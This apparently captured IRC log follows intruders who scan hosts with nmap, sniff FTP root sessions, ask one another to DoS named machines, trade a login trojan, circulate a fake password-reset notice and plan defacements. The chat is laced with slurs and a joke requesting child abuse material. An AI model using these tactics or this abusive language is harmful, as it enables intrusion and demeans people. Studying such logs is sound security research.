my heaf :D1ck! ::( :D1ck! :head :m4ry! :LOL :m4ry! :LOL :m4ry! :Sysop .. :m4ry! :sigh :m4ry! :talk to him :D1ck! :hahaha :m4ry! :tell him ur really sorry etc.. :m4ry! :SN1P3R :D1ck! :he lives in romania :m4ry! :GO TO THE US RIGHT NOW AND GIVE ME UR PHONE NUMBER :D1ck! :??? :m4ry! ::-x :m4ry! :(gasp) :D1ck! :HAHAHAHA :D1ck! :are u feeling ok? :D1ck! :wtf is gasp :m4ry! :man :m4ry! :these guys are eating my head :m4ry! :i had to fix their modem, sound card, speakers, mic :D1ck! :nam :D1ck! :who? :m4ry! :nwo they want me to get dialpad woo work :D1ck! :HAHAHAHAHAHAHAHAHAHAHAHAHAHA :m4ry! :mamo's :m4ry! :house :D1ck! :LOL :D1ck! :ROFL :D1ck! :oh :D1ck! : :D1ck! :ROFL :D1ck! :elite HACKER m4ry;) :D1ck! :HEATAZ :m4ry! :DEATHaCeS ? :m4ry! :jupe? :D1ck! : CAN U FEEL TH BLINK :D1ck! :? :D1ck! :yeah :m4ry! :hacker my foot :D1ck! :jupe :m4ry! :nah :m4ry! :non-ansi terminal :D1ck! :hahahah :m4ry! 
:vt100 owns yew :D1ck! :oh :D1ck! ::/ :m4ry! :it sux :D1ck! :TERM=elitehackers :m4ry! :black & white :D1ck! :telnet 127.0.0.1 :D1ck! :bash# :D1ck! :lol :D1ck! :get mIRC :D1ck! :#$@#$@#$ :m4ry! :i have it :m4ry! :i hate it :m4ry! :but it's really fucked up :D1ck! :oh :D1ck! :use it :m4ry! :DALnet :D1ck! :hahaha :m4ry! :all lahories go to DALnet :m4ry! :buncha faggots :D1ck! :heh :D1ck! :LOL :D1ck! :faggots :D1ck! :#ph33r-the-b33r == dalnet :m4ry! :Lahore = GAY land :D1ck! :#ph33r-the-b33r == dalnet :D1ck! :BWHAHAHA :D1ck! :LAHORE = ultra gay :m4ry! :i met rave- on Darknet :D1ck! :yep :m4ry! :EFnet :m4ry! ::) :D1ck! :Interesting ports on ns3.example.net.xx (192.168170.1.99): :D1ck! :Port State Protocol Service (RPC) :D1ck! :32892 open tcp (rusersd V2-3) :D1ck! :we were hanging in #k1dd13 for a while :D1ck! :on efnet :D1ck! ::P :m4ry! :scan UDP (same port range) to find sadmind :m4ry! :get example mail server :m4ry! :and man :m4ry! :PLEASE :m4ry! :scan this WOL shit :D1ck! :nmap -PS80 -sR -sS $1 -p 32000-33000 :D1ck! :$1=argv[1] :D1ck! :hahaa :m4ry! :com192.168 :m4ry! :192.168 :m4ry! :.*.* :m4ry! :;) :D1ck! :well :D1ck! : HEHE :D1ck! :LAME MOFO :D1ck! : :D1ck! :<_cen:#Linuxsex> :) :m4ry! :or just add a example zccount :D1ck! :cen == tc :m4ry! :the WOL guys are stupid :D1ck! :MAN i lost example :D1ck! : :m4ry! : ircname : boo hoo griddypoo :m4ry! :| channels : +#LINUXSEX :m4ry! :LOL :m4ry! :(_cen) :D1ck! :gegege :m4ry! :haww :m4ry! :u lost example? :m4ry! :how? :m4ry! :why :m4ry! :when :m4ry! :where :D1ck! :g :D1ck! :hehe :m4ry! :WHY :m4ry! :WHYYYYY :m4ry! :i need 3r33t-hax0r hours :D1ck! :coz :D1ck! :rlogin was fucked :D1ck! :i dint have a login.trj :m4ry! :use vortex :m4ry! : :D1ck! :HAHAHAHAHAHHA :D1ck! :k :m4ry! :ok :m4ry! :now i gotta sleep :m4ry! :my cuz has exams tommorow :D1ck! :i never tried vortex :D1ck! :LOL :m4ry! :and we all sleep in the same room *yuck* :D1ck! :ok :D1ck! :cya :D1ck! :hahaha :m4ry! :vortex owns ou.. 
i got back firewalled hosts from that :D1ck! :*LOL* :m4ry! :all ports firewalled (TPCP) except for port 1-1024 :D1ck! :kewl :D1ck! :hahhaa :m4ry! :ok :m4ry! :i'm out :D1ck! :k :D1ck! :go :D1ck! :run :D1ck! :bye :D1ck! : :m4ry! :i would detach BX, but this SunOS version really fucks up and doesn't re-sttae-attack :m4ry! :attatch :m4ry! :attach :D1ck! :hahhaa :D1ck! :do it :D1ck! : /detach :D1ck! : /detach :D1ck! : /detach :m4ry! :sigh :m4ry! :ok :m4ry! :or nevermind :D1ck! : /away detached :m4ry! :i need to add a user :m4ry! :viper :m4ry! :to get better ident :) :D1ck! :hehe :m4ry! :bye :D1ck! :ok :D1ck! :bye :D1ck! : SignOff m4ry: :D1ck! :fuck :D1ck! :J4n3 :D1ck! :the box i owned .xx :D1ck! :i saw h4r33 logging in with root/owned :D1ck! :but i dont use root/owned :D1ck! :so its his box :D1ck! :HAHAHAHAHA :D1ck! :lamah :D1ck! :brb :D1ck! :yo :D1ck! :J4n3 :D1ck! :there? :D1ck! :.add D1ck * D1ck 100 1 4 NOTICE D1ck :Handle D1ck is already in use :D1ck! :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck! :dos_ nic dns-gov :D1ck! :dos_ nick dns-gov :D1ck! :dos__ nick ^6thsense :D1ck! :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck! :_EATHaCeS nick jupe-bot :D1ck! :__ATHaCeS nick jupe2-bot :D1ck! :.add D1ck * D1ck 100 1 4 NOTICE D1ck :Handle D1ck is already in use :D1ck! :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck! :dos_ nick k-rad :D1ck! :dos__ nick hyper :D1ck! :dos___ nick teardrop :D1ck! :dos___ nick pepsi :D1ck! :dos____ nick pepsi :D1ck! :DoS____ nick pepsi :D1ck! :dos_ :D1ck! :dos_ say hehe :DoS_! :hehe :D1ck! :dos__ say hehe :D1ck! :dos___ say hehe :DoS___! :hehe :D1ck! :dos____ say hehe :DoS____! :hehe :D1ck! :dos_ nick k-rad- :D1ck! :dos___ nick neat :D1ck! :dos____ nick bawt :D1ck! :dos____ nick TotalKaoS :D1ck! :dos____ nick Tota1KaaS :D1ck! 
:.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels USER werd . . :DoS =- Day 05 June 8 :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :J4n3 :errrrrrr :J4n3 :why banned ? :( :D1ck :? :D1ck :oh :J4n3 :heh id id :D1ck :i thouh :D1ck :oh :D1ck ::) :D1ck :d4v3 :J4n3 :haha k :D1ck :i lost my NS :D1ck ::( :J4n3 :listen :D1ck :): :D1ck :? :J4n3 :oh shit :J4n3 :bad very bad :D1ck :?? :D1ck : listen :D1ck : listen :D1ck : listen :D1ck :? :D1ck :example.com.pk,example.net, example.com :D1ck :J4n3 :D1ck :user192-168-74-106.example.net :D1ck :bsd.example.com :D1ck :is.the.fresh.prince.of.hardcore.example.xx.us :D1ck :dos those 3 :D1ck :please :D1ck : :D1ck :PLEASE :D1ck :PLEASE :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :D1ck :? :D1ck :Inspectah :D1ck :inst :J4n3 :d1ck :J4n3 :.up :J4n3 :[ b-a-c-k ] :m4ry :i hate this place :m4ry ::) :J4n3 :[ frozen ] [ Auto-away after 15 mins - 00:01:41 ] - [J4n3-X] [1.0] :J4n3 :[ frozen ] [ Auto-away after 15 mins - 00:01:41 ] - [J4n3-X] [1.0] :J4n3 :.up :D1ck :.op :D1ck :mop :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :Sp07 :suck :Sp07 :dick :Sp07 :and :Sp07 :die :D1ck :heh :D1ck :man :D1ck :i lost 2 NS$@$ :D1ck :right nw :Sp07 :that :Sp07 :sucks :Sp07 :dick :D1ck :5 minutes :D1ck :some moron tookover :Sp07 :fucking #7thsphere can never get x/w :Sp07 :how fucking gay :D1ck :and his kit overwrote all my backdoors :D1ck :hahahaha :D1ck :x/q == gay :D1ck :x/w == gay :Sp07 :[03:50] Sp07, I did answer your question. If you know so much, I can't help you anymore. :) :Sp07 :what a little bitch :Sp07 :hehe :D1ck :HAHAHAHA :D1ck :#cservice :D1ck :#zy :D1ck :#zt :D1ck :gay :D1ck :@@@@@@@@@@@@ :D1ck : :Sp07 :i was asking them if 7thsphere can be registered :Sp07 :they said no its a "war program" :D1ck :hahahaha :Sp07 :what a fucking moron :D1ck :LOl :D1ck :fuck my mood's off :D1ck :coz i saw some morons nick :Sp07 :? 
:D1ck :'D1z4574 :Sp07 :[03:52] Sp07, I did help you. #7thsphere will NEVER be removed from the blacklist :D1ck :'D1z4574' :Sp07 :hahaha :D1ck :ROFLAMO :D1ck :Sp07 :D1ck :i`m leeeet :D1ck : :D1ck ::) :Sp07 :[03:52] why will it be never removed/ :Sp07 :[03:52] ? :Sp07 :[03:52] cause your too lazy to take it off? :D1ck :HAHAHAHHAHAHA :D1ck :+b :D1ck :? :Sp07 :[03:53] *** You were kicked from #CSERVICE by X ((RWI) Too lame to be on IRC) :Sp07 :hehe :D1ck :lol :Sp07 :let me message that whore :D1ck :./dso :D1ck :./dos :D1ck :oki :Sp07 :not yet :Sp07 :ill dos him :Sp07 :after im done talking to him :D1ck :oki :D1ck :say 'dont mess with #delusion' :D1ck :hahaha :D1ck :or i`ll dos j0h :D1ck :man :D1ck :hm :Sp07 :did you hack any irix? :D1ck :irc sucks :Sp07 :Sp07 is ~Sp07@delta.example.edu * ? :D1ck :i`m bored :Sp07 :yep :D1ck :nop :D1ck :i tried :D1ck :it hangs :D1ck ::) :D1ck :Sp07 :D1ck :help m :D1ck :me :Sp07 :? :D1ck :192.168.1.22 => ns2.example.net [21] :D1ck :USER root :D1ck :CWD ~meltahir :D1ck :PORT 192,168,1,22,149,231 :D1ck :LIST mod* :D1ck :TYPE I :Sp07 :ACTION helps d1ck :D1ck :PORT 192.168,1,22,149,232 :D1ck :TYPE A :D1ck :NLST mod_perl-1.24.tar.gz :D1ck :what the fuck? :Sp07 :thats h4r33s shell :Sp07 :hehahaha :Sp07 :e :D1ck :thats the root pass for ns2.example.net ? :Sp07 :no :D1ck :nope its not :D1ck :its on a subnet :D1ck :then? :Sp07 :then? :Sp07 :I dunno :Sp07 :where are you sniffing from? :Sp07 :umm doesnt it have to be the same network? :D1ck :tango.example.com :D1ck :dunno :Sp07 :192.168.1.1 192.168.1.10 :Sp07 :yeah :Sp07 :just wait :Sp07 :and I think you wioll get someones password :D1ck :oki :Sp07 :I got that sometimes :Sp07 :where it wouldnt show the password :Sp07 :or when it wouldnt show user and pass :Sp07 :some fucker was dosing me today =( :D1ck :oh :Sp07 :some pussy :D1ck :haha :Sp07 :was it you? :D1ck :weeeeeena :Sp07 :j/k :D1ck ::( :Sp07 :they dosed my friends shell :D1ck :OH Sp07 :D1ck :potheads.com? 
:Sp07 :but when I got on this I dont think they could dos it no mor :Sp07 :yeah :Sp07 :.net :D1ck :make me a VHOST :Sp07 :I cant :D1ck :h4r33.is.a.fucking.example.com :Sp07 :thats a good thing :Sp07 :heeh :D1ck :h4r33.and.grid.are.fucking.example.com :D1ck :hehe :Sp07 :why you complimenting him?? :Sp07 :im a pothead :Sp07 :hehe :D1ck :oh :D1ck :what does it mean btw :P :D1ck :? :Sp07 :someone who smokes lots of weed :Sp07 :hahaha :Sp07 :pot-heads :Sp07 :pot = weed :D1ck :oh :D1ck :i get tons f weed :D1ck :but :D1ck :i dont do it :Sp07 :heh :Sp07 :not weed in your garden or anything :Sp07 :the drug :Sp07 :s :Sp07 :drug weed :Sp07 :I got some weed with me right now :D1ck : 192.168.1.22 => ns2.example.net [21] :D1ck :USER root :D1ck :CWD ~meltahir :Sp07 :but I cant smoke it cause my dads here :D1ck :man :D1ck :wtf is that? :Sp07 :cwd :Sp07 :that is like :Sp07 :umm :D1ck :haha :Sp07 :cd ~meltahir :Sp07 :like its a directory :D1ck :oh :D1ck :ah :D1ck ::) :D1ck :ok :Sp07 :its not his password hehe :Sp07 :[04:06] Hackers and crackers wanna help us in #pakt ?? We need to hack the undernet and the fucking lame opers come join and ask |W|-|G| for more info, thanks for your help.. KILL THE UNDERNET :Sp07 :hahaha :Sp07 :lets go dos all of them :D1ck :hahahahaha :Sp07 :they kicked me =( :D1ck ::) :Sp07 :we need to do something on irc that will make us money :D1ck : i help pakt out with the reporting of child pornographers :D1ck :AHAHAHAHAHA :Sp07 :ns3.example.net :D1ck :I WANT KIDDIE PORN :Sp07 :thats h4r33 :D1ck :yeah i know :Sp07 :ACTION slaps sximap around a bit with a large trout :Sp07 :oops :D1ck :rofl :D1ck :man :D1ck :i`m hunguhry :Sp07 :go eat :D1ck :its 4 am :Sp07 :go hunting :D1ck :and kithen is downstair :Sp07 :go hunt for some cockroaches :D1ck ::( :D1ck :rofl :Sp07 :mmMMmMMmmmmm :Sp07 :m :D1ck ::) :D1ck :? :D1ck :MY LINUX MECHS ROCKS :D1ck :%$#@ :D1ck :i lost my 90 day uptime box :D1ck ::( :Sp07 :heh :Sp07 :ITS ALMOST TIME FOR ME TO SMOKE SOME WEEED :Sp07 :noddles? 
:Sp07 :hehe :D1ck :hahaa :D1ck :hehe :D1ck ::) :Sp07 :isnt it neat :Sp07 :eat :Sp07 :hehe :Sp07 :you think too much about food :D1ck ::) :D1ck :i`m FAT :D1ck ::) :D1ck :hehe :Sp07 :forr eal? :Sp07 :heh :Sp07 :you fat ass :D1ck :dont taunt me :( :Sp07 :how much do you weigh? :D1ck :): :Sp07 :sorry :D1ck :400 :D1ck :400 :D1ck :np :Sp07 :lol :D1ck ::) :Sp07 :for real :D1ck :oh well 300 :D1ck ::) :Sp07 :how much do you weight? :D1ck :for real :D1ck :300 punds :Sp07 :for real? :D1ck :yes :Sp07 :you serious? :D1ck :for real :D1ck : :D1ck :yep :D1ck ::) :D1ck :serious :Sp07 :dont lie :Sp07 :hehe :D1ck :i`m FAT :Sp07 :300 is a lot :D1ck :as :D1ck :s :D1ck ::) :D1ck :nope i`m 300#$@ :Sp07 :how old are you? :D1ck :17 :D1ck :;> :Sp07 :DAMN :Sp07 :hehe :D1ck :kaos_ nick jupe :Sp07 :DAYUMMMMM :D1ck :kaos_ nick jupah :D1ck :.save :D1ck ::) :D1ck :welp, i`ll lose it :Sp07 :DAYYYYYYYYUMMMMMMMMMMMMMMMMMMM :Sp07 :M :Sp07 :does that look like H OR M? :D1ck :hahaa :Sp07 :H M :D1ck :dude :D1ck :4 years back :Sp07 :H M :Sp07 :H M :D1ck :i was 400 :D1ck :and then i lost 200 :Sp07 :DAYUMMMMMMMMM :Sp07 :you liar :D1ck :nutriotion :D1ck :and then :Sp07 :how can you be 400 pounds when your 13? :D1ck :I WAS :Sp07 :you liar :D1ck :tendency :D1ck :and :D1ck :lots of eating :D1ck :but then i left the diet and excersise :D1ck :but i`ll loose it again :D1ck :i`m serious now :D1ck ::) :Sp07 :400 is too much for a 13 year old :D1ck :when i`m serious imake sure to achieve the goal :Sp07 :maybe like 200 is cool :Sp07 :but 400 :Sp07 :no way :D1ck :hahahaha :Sp07 :200 is still fat but 400 is like a fucking elephant :Sp07 :ehhe :D1ck :yep :Sp07 :I weigh like 150 right now :D1ck :200 with my height is all good. 
:D1ck :i`m 6,3 :D1ck :i`m 6.3 :Sp07 :your like twice as big as me :Sp07 :as in pounds :D1ck :lol :Sp07 :hehe :D1ck :i`m twice as big as 80% of the ppl :Sp07 :im like 5'8 I think :D1ck :in this world :D1ck ::) :D1ck :oh :Sp07 :thats humungus :Sp07 :hehe :D1ck :GIGANTIC :Sp07 :gorganic :Sp07 :TITANIC :D1ck : hahha :Sp07 :for real how much do you weigh?? :Sp07 :hehe :D1ck :300 :D1ck :i`m serious damit :Sp07 :DAYUMMMMMMMMMM :Sp07 :N :D1ck :i eat the whole fucking day with no excersise :D1ck ::) :Sp07 :N H M :Sp07 :those 3 letters look the same :D1ck :i`ll get lYPO sUcKtiON :Sp07 :i dont excercise that much too :Sp07 :but I dont weight that much :D1ck :<= tendancy :Sp07 :whats tendancy mean :D1ck :U ARE A AMERICAN AND I SPEAK BETTER ENGLISH THEN U? :D1ck :HEHEHEHE :D1ck : whats tendancy mean :Sp07 :hehehe :Sp07 :whats it mean? :D1ck :tendency mean that u have that inner inheritance :D1ck :to get BIG :D1ck ::) :Sp07 :oh :D1ck :u cant help :D1ck :u have to work VERY VERY hard :D1ck :i`m targetting to lloose 60 pounds :D1ck :in 2 months :D1ck ::) :Sp07 :me too :D1ck :how much u weigh :D1ck :? :Sp07 :i want to lose 100 pounds in 2 months :Sp07 :I weight 400 pounds :D1ck :haha :D1ck :LOL :Sp07 :hehehe :D1ck :seriously, i`m not joking :D1ck : :Sp07 :me too :D1ck :=p :D1ck :hehe k :D1ck :ure smart :Sp07 :thanks :Sp07 :herhe :D1ck :np :D1ck :heh :Sp07 : :Sp07 : :D1ck :so sup :Sp07 : :D1ck : :D1ck :? :D1ck : :D1ck : :Sp07 :MY DICK :D1ck :OH :D1ck :CAN I HAVE A GO :Sp07 :I WANT TO SMOKE WEED :D1ck :OR U WANT THE OTHE RGUY FIRST :D1ck :? :Sp07 :NO :D1ck :WEE :D1ck :WEED :D1ck :WEED :D1ck :WEED :Sp07 :WEEEEEEEEED :D1ck :what if the cops bust u :D1ck :??????? 
:Sp07 :NOT IF I SMOKE AT MY BACKYARD :Sp07 :HEHE :Sp07 :THEY WONT BUST ME :D1ck :HEHEH :D1ck :well :D1ck :my freind :D1ck :got :D1ck :busted :D1ck :in :D1ck :canada :Sp07 :NOTHING BIG :D1ck :he was smoking in his backyard :Sp07 :THEY JUST TAKE YOUR WEED AWAY :D1ck :some one comlained :D1ck :and he was arrested :Sp07 :WELL GO FUCKING KILL THEM :D1ck :well :D1ck :ure parents get charged if yure's a juvenule :Sp07 :UHH :D1ck :under juvinile delinquent act :Sp07 :ITS NOT THAT BIG OF A DEAL :Sp07 :I GOT CAUGHT A LOT OF TIMES :D1ck :AND U CAN BE TRIED AS A DULT :D1ck :AND :D1ck :BUSTED :Sp07 :NO YOU CANT :D1ck : :Sp07 :THEY JUST TAKE YOUR WEED :D1ck :oh :D1ck :hahahaha :Sp07 :AND THEN THEY GO SMOKE IT :D1ck :j/k :D1ck :J/K :Sp07 :THOSE BASTARDS :Sp07 :CAN :Sp07 :SUCK :Sp07 :MY :Sp07 :DIACK :D1ck :HAHAHAHAHA :D1ck :complain@ :D1ck :DOES YURE MOM AND DAD SMOKE MARAJUANA :D1ck :? :Sp07 :NO :D1ck :that sucks :D1ck : :Sp07 :IF I COMPLAIN THEY WILL GET THOSE STICKS AND BEAT ME :D1ck :all my freinds in canada's mom dad, stem mom stepdad smoked weed :D1ck :HAHAHAHAHAHA :D1ck :HAHAHAHAHAHA :Sp07 :HAHAHHHAHHHHHHHHHHHHHHHHHHHHHHHH :D1ck :HAHAHHHAHHHHHHHHHHHHHHHHHHHHHHHHAHAHAHAHAHA :Sp07 :ITS TRUE :Sp07 :THEY ARE NOT COPS :Sp07 :THEY ARE A GOVERNMENT GANG :D1ck :smoking marjuana is likee 'cool'? :Sp07 :I GUESS :Sp07 :ITS FUN :D1ck :oh :Sp07 :ITS NOT LIKE SMOKING :D1ck :it tastes good? :Sp07 :NO ITS NOT LIKE SMOKING :Sp07 :SMOKING CIGARETES IS LIKE POINTLESS :Sp07 :WEED AFFECTS YOUR MIND AND BODY :D1ck :yep :D1ck :well :D1ck :? :D1ck :oh :D1ck :and u get hungary :D1ck :and :D1ck :shit :D1ck :? :Sp07 :YUP :Sp07 :ITS NOT JUST THAT :Sp07 :I LOVE WEED :D1ck :coolk :D1ck :cool :Sp07 :IT TAKES ME TO MY OWN WORLD :Sp07 :MWUHAHAHAHAHA :D1ck :Ok i disclose my self. :D1ck :I`m a FED :Sp07 :?? :Sp07 :OH SHIT :D1ck :You are busted :Sp07 :FUCK YOU :Sp07 :DIE MOTHER FUCKER :Sp07 :FOR REAL???? :Sp07 :officer :D1ck :yes. 
:Sp07 :suck my dick :D1ck :dude :D1ck :relax :Sp07 :no wonder :Sp07 :how would a pakistanian know english :Sp07 :its all clear :Sp07 :hey :D1ck :hehe :Sp07 :your not really a fed right?? :D1ck :y0 :D1ck :? :Sp07 :dont even joke like that :D1ck :nope :D1ck :ok :Sp07 :MAKES ME FEEL NERVOUS :D1ck :i`m not a fed :D1ck :why did u take it so serious? :Sp07 :I DUNNO :D1ck :oh :D1ck :ok :D1ck ::P :D1ck :if i was a fed :Sp07 :SHIT MY DADS LEAVING :Sp07 :TIME TO GET HIGH :D1ck :i wont be liek hacking shit :D1ck :hahahaa :D1ck :ok :Sp07 :HOPEFULLY HE WONT BE BACK FOR A WHILE :D1ck : FUCK YOU :D1ck : DIE MOTHER FUCKER :D1ck : FOR REAL???? :D1ck : officer :D1ck :hehehe :Sp07 :DAMN HIS CAR IS NOT PULING OUT THE DRIVEWAY :D1ck :hehee :Sp07 :IF FEDS WERE TRYING TO CATCH ME FOR THE SHIT IVE DONE LONG TIME AGO :Sp07 :THAT WOULD BE FUCKED UP CAUSE I STOPPED DOING ILLEGAL SHIT NOW :D1ck :yep :Sp07 :HIS CARS GONE :Sp07 :BRB :D1ck :man dont think i`m a fed :D1ck ::) :D1ck :i`m a elite hacker :D1ck :brb too :Sp07 :FUCK :Sp07 :HES GONNA COME RIGHT BACK :D1ck :lol :Sp07 :*SNIFF* *SNIFF* :Sp07 :I WANT TO SMOKE WEED :D1ck :no one else at home :D1ck :bro? :D1ck :sis :D1ck :mom :D1ck :? :Sp07 :MY BROTHER :Sp07 :BUT I DONT GIVE A FUCK :Sp07 :I WILL KILL HIM IF HE TELLS :Sp07 :HEHE :D1ck :LOL :Sp07 :HES A LITTLE KID HE DOESNT KNOW WHAT THE FUCK IS GOING ON :D1ck :u guys can like smoke in front of parents eh? :D1ck :thats like col :Sp07 :HELL NO :D1ck :cool :D1ck :? :Sp07 :WHY DO YOU THINK WE CAN SMOKE IN FRONT OF PARENTS? :Sp07 :FUCK YOU FED :Sp07 :STOP ASKING ME QUESTIONS :D1ck :heh :D1ck :coz all my freinds did :D1ck : :Sp07 :WELL DOWN IN AMERICA ITS DIFFERENT :D1ck :oh :Sp07 :YOUR A FED :D1ck :no :Sp07 :YES :D1ck :i`m not :D1ck :hehe :Sp07 :YES :Sp07 :YES :D1ck :man :D1ck :man :D1ck :if i were a fed :D1ck :why would i hack stuff? 
:D1ck :defacements
:D1ck :qall
:Sp07 :UHHH SO YOU SAY
:D1ck :all these bots
:Sp07 :JUST TO GET IN THE CROWD OF HACKERS
:D1ck :no
:D1ck :hehehe
:D1ck :lol
:Sp07 :THESE BOTS COULD BE PAYED BY THE GOVERNMENT
:D1ck :hahah
:D1ck :man
:Sp07 :YOU THINK FEDS WONT DO ILLEGAL THINGS?
:Sp07 :YEAH RIGHT
:D1ck :what proof u want
:D1ck :
:D1ck :i live in pakistan
:Sp07 :HOW DO I KNOW THAT/?
:D1ck :call me
:D1ck :o
:Sp07 :GIMME YOUR #
:D1ck :well
:D1ck :599823
:D1ck :call me
:Sp07 :THATS NOT A REAL #
:D1ck :that is
:Sp07 :WHAT DO I PRESS ON THE PHONE
:D1ck :9221 is the key
:Sp07 :1-
:Sp07 :WHAT?
:Sp07 :19221599823???
:D1ck :92 21 599823
:D1ck :yea
:D1ck :let me come with my real ip
:Sp07 :CALL YOU SO YOU CAN TRACE MY PHONE #?
:D1ck :man
:Sp07 :HEHEHEEHE
:D1ck :ask rr
:Sp07 :just kidding
:Sp07 :hahahaha
:D1ck :*sigh&
:D1ck :*sigh
:D1ck :8:)
:Sp07 :RR IS A FED TOO MAN
:Sp07 :DIDNT YOU KNOW THAT?
:D1ck :REALLY?
:D1ck :COOOOOOOOL
:D1ck :Sp07
:D1ck :are u there
:D1ck :I AM A FED
:D1ck ::)
:Sp07 :?
:Sp07 :afk
:Sp07 :fuck tou
:Sp07 :afk
:D1ck :heeh
:D1ck :k
:D1ck :^6thsense join #grid
:Sp07 :nacl
:Sp07 :back
:Sp07 :me go
:Sp07 :bye bye
:D1ck :dns-xxx join #grid
:D1ck :.part #grid
=-= Day 06 June 9
:jupe__
:D1ck :J4n3
:J4n3 :D1ck
:D1ck :sup
:D1ck ::)
:J4n3 :i can't access www.example.com with the user k1dd13 and pass u gave
:D1ck :shit
:D1ck :i think they clsoed the site?
:D1ck :even soulslack couldnt
:J4n3 :erhmm
:D1ck :sha..d4v3
:J4n3 :yup that is
:D1ck :hmm
:D1ck :site works?
:J4n3 :wait
:J4n3 :yup
:J4n3 :site is working
:D1ck :yaar
:D1ck :hmm
:D1ck :may be that little fuck changed it?
:D1ck :i logged in witht he pass some while go
:D1ck :sha..d4v3
:D1ck :in the url did u choose www.example.com?
:D1ck :in the url did u choose www.example.com?
:D1ck :in the url did u choose www.example.com?
:J4n3 :wait lemme login from webstie
:J4n3 :website
:J4n3 :yeah
:J4n3 :i did
:D1ck :oki
:D1ck :oh
:D1ck :website say karo do it from the website
:D1ck :oki
:D1ck :oye brb p00p
:J4n3 :k
:D1ck :~back
:D1ck :sigh
:D1ck ::)
:J4n3 :ATTENTION:
:J4n3 :Some users password information became corrupted during a hard drive backup. This is easily fixed if you
:J4n3 :following the instructions below.
:J4n3 :1) Go to www.example.com and log in as normal EXCEPT where it asks for your password leave it blank.
:J4n3 :2) Once you are in your example.com account manager click on Account Information in the bottom right.
:J4n3 :3) Next click on change password.
:J4n3 :4) Now you are asked to type in your current password and your new passwords. Just leave the current password
:J4n3 :opti
:D1ck :hmmm
:D1ck :do it@?
:J4n3 :trying to do it, logged in from www but again same message
:J4n3 :trying from www.example.com
:J4n3 :ek tho ek gantay main page load hotha hai iska one is that it takes an hour for the page to load
:J4n3 ::(
:D1ck :hmmmm
:D1ck :hehe
:D1ck :get it some where else?
:J4n3 :do u have those htmls in a zip file etc ?
:D1ck :oye
:D1ck :J4n3
:D1ck :send me that linux login trojan
:D1ck :not root/owned
:D1ck :the other wala the other one (wala = one, in a person connotation, like "the one")
:D1ck ::)
:D1ck :yep
:D1ck :i think i do
:J4n3 :its on ftp get it
:J4n3 :shell.example.net
:D1ck :oki
:D1ck :whats the pass?
:D1ck :user pass?
:D1ck :oki
:D1ck :ACTION is away: (sex) [BX-MsgLog On]
:D1ck :ACTION is back from the dead.
Gone 0 hrs 0 min 2 secs
:J4n3 :hehe
:D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:D1ck :gridisgay nick wise
:gridisgay
:D1ck :gridsux hostile
:D1ck :gridsux nick le
:gridsux
:D1ck :gridsux nick hostile
:D1ck :kaos__ nick thor`
:kaos__
:D1ck :kaos___ nick nohup
:D1ck :kaos_ nick host-t-ns
:kaos_
:D1ck :kaos___ nick nohup-
:D1ck :.add D1ck * D1ck 100 1 4
NOTICE D1ck :Handle D1ck is already in use
:D1ck :.save'
:D1ck :.save
NOTICE D1ck :Lists saved to file emech233.users
NOTICE D1ck :Levels were written to ./mech.levels
:D1ck :kaos____ nick nohup-
:kaos____
:D1ck :nohup- nick nohup
:nohup-
:D1ck :nohup save
:D1ck :hehe
:D1ck :hafeeeez
:D1ck :.add J4n3 * J4n3 100 1 4
NOTICE D1ck :Handle J4n3 is already in use
:D1ck :.save
NOTICE D1ck :Lists saved to file emech233.users
NOTICE D1ck :Levels were written to ./mech.levels
:D1ck :all new LINUX BOTS
:D1ck :ner hot
:J4n3_
:D1ck :J4n3
:D1ck :
:D1ck ::)
:D1ck :mera babies my babies
:D1ck :eheheh
:J4n3 :D1ck :)
:J4n3 ::O)
:D1ck ::)
:D1ck :sup?
:D1ck :scan isps for bind
:D1ck :we`ll deface indian pages [note from Saumil: those bastards]
:D1ck ::)
:J4n3 :errr yeah actually us raath j0e kay server par sub delete karna para tha err yeah actually that one night we had to delete everything from j0e's server
:J4n3 :thakay usay patha na chalay kay mainay scanning ke the that he wouldnt come to know that i did scanning from it
:D1ck :oh
:D1ck :
:D1ck :oki
:D1ck :hehehe
:J4n3 :aaj raath jama kartha hon linux say khud he tonight i will assemble (collect) everything from linux itself
:D1ck :where is my account?
:J4n3 :oye worldtel r0x now
:D1ck :jeje
:J4n3 ::p
:D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:J4n3 :D1ck
:D1ck :yo
:J4n3 :site is up at www.example.net
:J4n3 :i will set up graphics and cgi password stuff tomorrw
:D1ck :kewl
:J4n3 :but
:D1ck :oki
:J4n3 :tell me where is the link of that passwod page ?
:J4n3 :i mean where u want to put that password page link ?
:D1ck :?????
:D1ck :oh
:D1ck : /elite-sploit-59865.html
:D1ck :?
:J4n3 :u want that sploit page na ?? where should be the link for it from main page ?
:D1ck :nope hidden
:D1ck :nope hidden
:D1ck :
:J4n3 :ok
:J4n3 ::)
:D1ck :;)
:J4n3 :www.example.net/members ?
:D1ck :yep
:D1ck :yep
:J4n3 :h4r33 is ~intrusion@ns3.example.net.xx * ONLY GOD CAN JUDGE ME
:J4n3 :h4r33 on @#delusion
:D1ck :hahaha
:D1ck : SignOff h4r33: #LinuxSex (Ping timeout for h4r33[ns3.example.net.xx])
:J4n3 :hehe
:J4n3 :i'm dosin satnet
:D1ck :hehe
:D1ck :kewl
:D1ck :ahhahhAhaHAhahHAha
:J4n3 :can't u see all ping time out lol
:D1ck :hahaha
:J4n3 :ph34r my b4ndw17h :pPpPpPP
:D1ck ::)
:D1ck :i pjh34r yure sk1llz muh sand niggah
:D1ck :hehe
:J4n3 :lol
:J4n3 :tight :p
:J4n3 :oye
:J4n3 :i have a sploit for BitchX buffer overflow
:J4n3 :but codin kuch sahi nahin but the coding isnt correct
:J4n3 :it will get a root shell on some port
:J4n3 :BitchX 75 pana
:J4n3 :or 74 i think
:D1ck :hmmmm
:D1ck :send me the code.
:J4n3 :itn in linux, get it later when i boot
:D1ck :J4n3
:D1ck :?
